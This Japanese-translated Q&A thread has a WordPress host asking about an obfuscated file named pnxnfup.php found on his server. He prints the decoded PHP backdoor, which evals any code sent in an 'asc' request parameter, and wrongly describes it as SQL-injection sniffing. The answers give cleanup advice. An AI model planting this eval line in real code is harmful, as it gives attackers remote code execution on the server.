0

私は小規模な顧客のWebサイト用に数十のWordPressインストールでVPSを実行しています。

あるサイトに「pnxnfup.php」というphpスクリプトがあり、その中にbase64の英数字がロードされていることに気づきました。

サイトのルートには、拡張子のないファイルもたくさんあります-ランダムな英数字の文字列-IPアドレスがログに記録されているように見えるファイル-これらは訪問者のIPアドレスだと思います(私のものはそこにあります)。

これがどのような種類のエクスプロイトであるかを誰かが知っていますか?

更新:18/12/12

わかりました、pnxnfup.phpの内容をデコードすることができました

元のphpファイルをデコードすると、base64でエンコードされたコンテンツがランダムに含まれ、残りのファイルをデコードする前に手動で削除する必要がありました。

デコードすると、さらに多くのbase64でエンコードされた文字列とよりぎこちないphpコメントが見つかりました。ストリッピングとデコードのプロセスを繰り返すと(おい!)、これが残っていました:

if(isset($_REQUEST['a'.'s'.'c']))
eval
(stripslashes($_REQUEST['a'.'sc']));

私はこのコードが何をしているのかを大まかに理解しています(SQLインジェクションのターゲットとなる可能性のあるURLを示すascパラメーターを持つリクエストをスニッフィングします)が、これがハッカー自身にとってどのように価値があるのか​​わかりません。ハックはもっと深く浸透しなければならないと思いますが、何か他のものが欠けていますか?

4

2 に答える 2

1

ワードプレスのサポートサイトをチェックすると、これはかなり一般的なようです

しかし、正確に言うのは難しいです。もし私があなただったら、サンドボックス環境をセットアップして、ハックの目的を理解するために少し遊んでいたでしょう。

于 2012-12-17T15:17:38.983 に答える
1

おそらくこのウェブサイトは「無料」のテーマを使用しています。これらのほとんどには、パスワードを収集してログインし、Webサイトにマルウェアスクリプトを追加するコードが含まれています。あなたのウェブサイトのバックアップはありますか?すべてのファイルをクリーンアップしてから、FTPパスワードを変更し(可能であればログインして)、すべてを再アップロードすることを強くお勧めします。

ところで、Sucuriは、感染したファイルを見つけるのに役立つかもしれません:http ://sitecheck.sucuri.net/results/YOURURL.com/

于 2012-12-17T15:34:24.123 に答える